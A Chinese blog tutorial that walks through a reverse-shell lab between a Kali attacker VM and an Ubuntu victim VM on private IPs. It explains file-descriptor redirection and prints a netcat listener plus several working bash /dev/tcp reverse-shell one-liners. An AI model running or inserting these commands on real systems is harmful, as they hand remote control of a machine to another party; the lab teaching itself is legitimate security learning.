今天进行实战远程操控
一.条件:
| 1 | 我们可以对被攻击者的电脑进行命令执行 |
|---|---|
| 2 | 被攻击者电脑上0,1,2各项权限不曾更改,或者更改你知道后续情况 |
二.如果想要测试需要准备的相关材料
1.两台不同ip的机器:
我这里准备的是一台Ubuntu 虚拟机(被攻击者)
ip:192.168.123.137(ifconfig即可查询)
一台kali linux虚拟机(攻击者)
ip:192.168.123.107(ifocnfig即可查询)
2.了解基本的nc军刀命令
我之前写过一篇博客(只针对本次测试的nc命令讲解):
https://blog.csdn.net/weixin_44270509/article/details/90272332
3.了解linux0,1,2各项权限的内容和重定向的有关知识
不了解的可以看看我之前的博客:
https://blog.csdn.net/weixin_44270509/article/details/90260012
4.一些shell的功能(我下文思路指导也会讲出该功能的用途)
三.思路指导
1.我们需要了解反弹shell的基本内容:
reverse shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
入何实现这个呢:
.我们需要在攻击者机器上先执行监听端口动向,从而第一时间获取信息
.我们需要在被攻击者的机器上执行重定向权限设置,将读写的权限转交到攻击者的电脑上
.我们需要一个多命令权限转交的中转,这就需要引用linux 再带的shell中的权限了
2.linux shell的主要内容:
Shell本身是一个用C语言编写的程序,它是用户使用Unix/Linux的桥梁,用户的大部分工作都是通过Shell完成的。Shell既是一种命令语言,又是一种程序设计语言。作为命令语言,它交互式地解释和执行用户输入的命令;作为程序设计语言,它定义了各种变量和参数,并提供了许多在高级语言中才具有的控制结构,包括循环和分支。
Unix/Linux上常见的Shell脚本解释器有bash、sh、csh、ksh等,习惯上把它们称作一种Shell。
这次我们主要使用bash shell
我们先主要了解这个shell:
linux里面的自带shell,bash是 Bourne Again Shell 的缩写,是linux标准的默认shell ,它基于Bourne shell,吸收了C shell和Korn shell的一些特性。bash完全兼容sh,也就是说,用sh写的脚本可以不加修改的在bash中执行。因为是默认的shell,所以基本上百分之九十的linux系统都存在,也是我们这次演练的原因
当然如果你想了解更多
四. 实战演练
首先我们在攻击者系统上执行可以进行监控端口的指令,主要是nc命令的显现:
首先我们先来准备一下命令:
nc -lvp 2233
会出现下面的样式
然后我们在被攻击的系统上执行我们(如果看不到下面的命令请务必查看我上面指向的博客了解)
bash -i>& /dev/tcp/192.168.123.107/2233 0>&1
我们来看一下效果
好像没有什么变化,但是我们在看我们攻击者的电脑上的变化,我顺便执行了一条ip查询指令:
然而查询出的ip确是
然后我们尝试在被攻击的电脑上执行命令
然而我们发现,无论是什么指令都没有什么显示,为什么呢,这就归功于我们之前的nc命令的功劳,如果到这你都好没有看我之前的博客,我就只能滑稽护体了
我们在攻击者的电脑上执行下之前命令
发现之前的命令都有显示,太真实了,因为我们把0,1,2都重定向到了攻击者的电脑上了啦…
五.其他的shell语句:
| 1 | bash -i>& /dev/tcp/192.168.146.129/2333 0<&1 |
|---|---|
| 2 | bash -i >& /dev/tcp/192.168.146.129/2333 <&2 |
| 与2等价 | bash -i >& /dev/tcp/192.168.146.129/2333 0<&2 |
| 3 | exec 5<>/dev/tcp/192.168.146.129/2333;cat <&5 |
六.总结
到此总结反弹shell就结束了,毕竟这是我一个人学习的经验,我希望如果我有错误大家可以及时评论指出,我好及时更正,谢谢
扫一扫
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
